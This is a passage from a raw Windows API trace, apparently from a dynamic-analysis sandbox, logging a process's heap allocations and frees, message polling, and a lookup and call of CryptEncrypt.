returned 0x2e54fe8 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x978688 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978688 | out: hHeap=0x970000) returned 1 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0269.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0269.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978688 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0269.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0269.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0269.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e52048, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0269.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0269.057] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0269.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0269.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0269.058] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x116, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x118) returned 1 [0269.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0269.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.058] CharLowerBuffW (in: lpsz="byte[280]", cchLength=0x9 | out: lpsz="byte[280]") returned 0x9 [0269.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0269.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0269.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0269.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x2e558d8 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x2e559f8 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559f8 | out: hHeap=0x970000) returned 1 [0269.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0269.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d00 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.060] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0269.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0269.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0269.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0269.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0269.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0269.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0269.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x2e558d8 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x9787a8 [0269.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0269.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0269.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0269.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0269.064] 